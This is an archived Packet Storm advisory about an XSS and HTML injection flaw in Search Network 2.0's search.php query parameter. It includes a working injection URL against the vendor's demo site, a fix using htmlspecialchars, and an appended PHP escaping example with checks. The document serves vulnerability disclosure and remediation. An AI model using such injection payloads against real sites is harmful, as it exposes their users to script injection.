Search Network 2.0 Cross Site Scripting

2011-08-07T00:00:00
ID PACKETSTORM:103780
Type packetstorm
Reporter darkTR
Modified 2011-08-07T00:00:00

Description

                                        
                                            `##############################################################  
  
[#] Script Name : Search Network 2.0  
  
[#] Vulnerability Type : XSS  
  
[#] Author : darkTR  
  
[#] Date : 03.08.2011  
  
[#] E-mail : darkTR@hotmail.com  
  
[#] Target : search.php?action=search_results&query=[XSS]  
  
[#] Demo : http://developer.searchnetworkhq.com/demo/search.php?  
  
#############################################################  
  
Exploits :  
  
HTML INJECTION  
  
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=“><marquee>darkTR<%2Fmarquee>  
  
XSS  
  
http://developer.searchnetworkhq.com/demo/search.php?action=search_results&query=[XSS Attack]  
  
Fixing the vulnerability:  
  
  
We can close the vulnerability by using htmlspecialchars. Open the index.php file and find:  
  
$result = file_get_contents($url);  
  
This line should be changed as follows:  
  
$result = htmlspecialchars(file_get_contents($url));  
  
After the fix, characters such as ">" and "<" will be converted to HTML entities and the vulnerability will be eliminated.  
  
darkTR | Code Hunters TIM   
`
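
The htmlspecialchars fix described above, applied at the point where the query is written into the page, as an added example that is not part of the original advisory or of the Search Network code. The helper names `h` and `render_search_header` and the form markup are hypothetical; the sample input is the HTML injection string from the advisory.

```php
<?php
// Added example, not Search Network code. Function names and markup are hypothetical.

/** Escape a value for use in HTML text or inside a quoted attribute. */
function h(string $value): string
{
    // ENT_QUOTES also encodes single quotes, which the default flags did not
    // do before PHP 8.1. ENT_SUBSTITUTE replaces invalid byte sequences
    // instead of returning an empty string. The charset is stated explicitly.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the search box and the result heading with the query escaped on output. */
function render_search_header(string $query): string
{
    $safe = h($query);
    return '<form action="search.php" method="get">'
         . '<input type="hidden" name="action" value="search_results">'
         . '<input type="text" name="query" value="' . $safe . '">'
         . '</form>'
         . '<h2>Results for ' . $safe . '</h2>';
}

/** Fail loudly if a check does not hold (works regardless of zend.assertions). */
function check(bool $ok, string $what): void
{
    if (!$ok) {
        throw new RuntimeException("check failed: $what");
    }
}

// Constructed input: the injection string shown in the advisory.
$query = '"><marquee>darkTR</marquee>';
$html  = render_search_header($query);

// The quote and angle brackets arrive as entities, so the attribute is not
// closed early and no new element is created.
check(strpos($html, '<marquee>') === false, 'no raw tag in output');
check(strpos($html, 'value="&quot;&gt;&lt;marquee&gt;') !== false, 'query is entity-encoded');

// Single quotes are encoded as well, covering single-quoted attributes.
check(h("'") === '&#039;', 'single quote encoded');

echo $html, PHP_EOL;
```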